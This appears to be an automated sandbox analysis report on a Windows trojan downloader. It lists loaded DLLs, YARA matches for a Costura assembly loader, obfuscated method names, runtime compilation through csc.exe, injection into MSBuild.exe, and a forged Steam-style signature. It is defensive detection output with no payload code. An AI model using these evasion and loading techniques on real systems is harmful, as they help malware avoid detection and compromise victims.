          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptnet.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: q costura.packetlib.pdb.compressed source: MSBuild.exe, 00000004.00000002.2388462794.0000000002D21000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: costura.costura.pdb.compressed source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1176486641.00000000032AB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2388462794.0000000002D21000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: q7C:\Users\user\AppData\Local\Temp\5dljncsi\5dljncsi.pdbt source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1176486641.00000000032E1000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: q7C:\Users\user\AppData\Local\Temp\5dljncsi\5dljncsi.pdb source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1176486641.00000000032E1000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: packetlibAcostura.packetlib.dll.compressedAcostura.packetlib.pdb.compressed#system.appcontextQcostura.system.appcontext.dll.compressed;system.collections.concurrenticostura.system.collections.concurrent.dll.compressed%system.collectionsScostura.system.collections.dll.compressed;system.collections.nongenericicostura.system.collections.nongeneric.dll.compressed=system.collections.specializedkcostura.system.collections.specialized.dll.compressed+system.componentmodelYcostura.system.componentmodel.dll.compressedKsystem.componentmodel.eventbasedasyncycostura.system.componentmodel.eventbasedasync.dll.compressedAsystem.componentmodel.primitivesocostura.system.componentmodel.primitives.dll.compressedGsystem.componentmodel.typeconverterucostura.system.componentmodel.typeconverter.dll.compressed source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1176486641.00000000032AB000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed5microsoft.win32.primitivesccostura.microsoft.win32.primitives.dll.compressed source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1176486641.00000000032AB000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: costura.packetlib.pdb.compressed source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, 00000000.00000002.1176486641.00000000032AB000.00000004.00000800.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.44195d0.4.raw.unpack, AssemblyLoader.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
          Yara detected Costura Assembly Loader
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32afe74.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32ab9fc.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.44195d0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.44195d0.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32ab9fc.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.32afe74.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe.325f8e8.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.1176486641.00000000032AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1176630709.0000000004239000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2384955038.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2388462794.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1176630709.0000000004419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe PID: 3928, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5036, type: MEMORYSTR
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeStatic PE information: 0x9CAA5CAD [Wed Apr 16 10:02:21 2053 UTC]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5dljncsi\5dljncsi.cmdline"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5dljncsi\5dljncsi.cmdline"Jump to behavior
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, -Module-.csHigh entropy of concatenated method names: 'xsyrrUBBNS', 'KRlTSXSMVr', 'WYWzUbsxWk', 'MPPGHgATuX', 'QvCHnTsqeg', 'TLXIdyvYwp', 'BeEDfVcFmM', 'wYrYAAvolb', 'IbsQraRgCi', 'KBxfvMRZBs'
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, gzljghNctbQsWvZDQKeYkLVCckSsrSactuvzQYblAJsukakNdVQIPMfvEIhVovLAaNZBZzNSJTyAsAsbZfovcsnGpaVhQfWfYRux.csHigh entropy of concatenated method names: 'bJNEiYYVoFcdqfWigpyIAsmZDFbDWsCAgUapsJndtrsJYRQKjOYItLXJxOaCWvZVdBXvfGQxbvoiZCbMOqtitThuXrSDJLhYswGw', 'mYsCLnLilj', 'SeqDTnpAFD', 'aTFXVcyrKT', 'GAbiQtRTSK', 'caOfPnQFZC', 'NguAEtsvHJ', 'OtxsDrdhMA', 'wwIVAaeAiI', 'lTshgAgAEw'
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, FnmGkzqFwAPHszNzMywHbygsnzIFdOArfpKlmpxXRWKKxEBcyDjYhSSggTsKRLBHayCdOCnxbyPfOvVIYGgAECjmxDesWNgfucKY.csHigh entropy of concatenated method names: 'HSblphjXhB', 'MLbuoEyYQC', 'yWMywkGfYd', 'PpcWPRRkyN', 'kJEhdjMXCE', 'VbeszLgDOe', 'AeYdMwIfEw', 'NozdsPsEun', 'yIDtiNlJxd', 'LnvunfKAvH'
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, qaTRLKKYkeajSBOubKqXkTISKEftWNgVmsPSmYivyOwvpCCDJMBjnJGwrbghFrbxYfXzMWicBVzvxmDhcBJklWIDLsAlSbPgMZwj.csHigh entropy of concatenated method names: 'FcRNEyHskkZfyYfeIRlbxuOtwXkzfsJyQtCZKVFMppsAsvMTVLyVNvMloxrHohmRBBofwftMlyMhbnabkqEtUNKvGqLmEYyhcAYR', 'pBFTRQQzHK', 'kyASFzEFvf', 'qLPTMFsnKK', 'NgmhYbOlxk', 'KfyBKuecmr', 'KDeiADLMhm', 'yDOXWeltUE', 'Lthkulnnir', 'BpasakbeHu'
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, RoBWmpCUWkoSVrvysqryPUdMKNKFPQXXymZiqdaQtWbEczZENzSnPHhXlOlzEXffmruIrmhopAfTSyKlNgRqYKiQfcXCSBmwQVsL.csHigh entropy of concatenated method names: 'eqnBrDXoCneMeZMyfOhCjEDopFvOoIcXgZhwSqYuMTnRYlySONqbOPBANYlMiiaTlhFeSqFPQMPpqLqegDaAsaiqxGIUemmETtGQ', 'VHEDXIPlSb', 'rqOWIqMsRD', 'WvlMjvmXfC', 'pwhfGpXgfx', 'EOjcajfLFD', 'OQbxqzvRtB', 'wRfqMUjJqt', 'sFnuYhliMa', 'qBsBNyuJOg'
          Source: SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exe, gHxPrLJoIEjawqwXDTXOQTyfuhinZFeAojUDSObidwMbgLPoBBDjDkbmisvkDwodzJLnvTePROKuhwYIrTLycVXeiIuAsRFHhJCx.csHigh entropy of concatenated method names: 'ZCSHwNsOAHeLtNSJKQbELHfNzExZjcmyUBJPbeboDjDADIhFZVWqHXMsxfiSqsExuGRSddIGONbCdEjQxSangVQXOrsVVjXkEggW', 'SbZtsEOniJ', 'rYVCEKuDtN', 'iXFuKdoSLk', 'GwfVevamUL', 'AelOkwAFmr', 'hnuyYUwEJo', 'pWCYcVTaxj', 'JhJImeMQko', 'CJFtctbGWk'

          Persistence and Installation Behavior

          barindex
          AI detected suspicious PE digital signature
          Source: Initial sampleJoe Sandbox AI: Detected suspicious elements in PE signature: Multiple critical red flags: 1) Certificate issued from China (CN) which is a high-risk country for malware. 2) Signature validation failed - cannot build chain to trusted root authority. 3) Claims to be from Valve/Steam but uses suspicious organizational details (O=SHA384, OU=RSA4096) instead of legitimate Valve Corporation details. 4) Compilation timestamp is set to 2053, which is clearly impossible and indicates timestamp manipulation. 5) While Valve/Steam are legitimate software publishers, this certificate appears to be impersonating them with fake details. The combination of failed signature validation, Chinese origin, suspicious organizational fields, and impossible future compilation date strongly suggests this is a malicious attempt to masquerade as legitimate Steam software.
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\5dljncsi\5dljncsi.dllJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader48.29860.1293.7282.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
